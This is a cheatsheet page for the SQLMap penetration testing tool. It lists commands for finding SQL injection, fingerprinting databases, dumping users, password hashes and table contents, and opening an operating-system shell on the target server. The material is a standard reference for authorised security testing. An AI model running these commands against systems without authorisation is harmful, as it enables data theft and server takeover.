Reduce context-switching for engineers

Self-Hosted AI Code Reviewer

Hexmos LiveReview AI-Powered Code Review
Live Review
AI-Powered Code Review

SQLMap - SQL Injection Detection Tool

Discover and exploit SQL injection vulnerabilities with SQLMap. This powerful tool automates the process of detecting and exploiting SQL injection flaws, providing detailed database information.

SQLMap Usage Examples

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It features a detection engine with sophisticated features for distinguishing SQL injection, a wide range of tactics for the ultimate backend database takeover, and a cross-platform, cross-database, and cross-operating system. This section provides common usage examples for SQLMap.

SQL Injection Detection and Exploitation

SQLMap can test a given URL for SQL injection vulnerabilities. It can also parse requests from tools like Burp Suite to test for vulnerabilities.

# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="<url>" --data="<post-data>" --banner

# Parse request data and test | request data can be obtained with burp
./sqlmap.py -r <request-file> <options>

Database Fingerprinting and Information Gathering

Once a vulnerability is found, SQLMap can fingerprint the database and gather crucial information about the database structure and user privileges.

# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint

# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname

# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba

# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords

Database Enumeration and Data Extraction

SQLMap allows for comprehensive enumeration of databases, tables, and columns, and can extract data from specific tables.

# Enumerate databases
./sqlmap.py -r <request-file> --dbs

# List tables for one database
./sqlmap.py -r <request-file> -D <db-name> --tables

# Other database commands
./sqlmap.py -r <request-file> -D <db-name> --columns
                                           --schema
                                           --count

# Enumeration flags
./sqlmap.py -r <request-file> -D <db-name>
                              -T <tbl-name>
                              -C <col-name>
                              -U <user-name>

# Extract data
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

Advanced SQL Operations and Shell Access

Beyond data extraction, SQLMap can execute custom SQL queries and even gain operating system shell access on the target server.

# Execute SQL Query
./sqlmap.py -r <request-file> --sql-query="<sql-query>"

# Append/Prepend SQL Queries
./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"

# Get backdoor access to sql server | can give shell access
./sqlmap.py -r <request-file> --os-shell

External Resources

← Back to databases cheatsheets All cheatsheets 🙏  Credits & Acknowledgments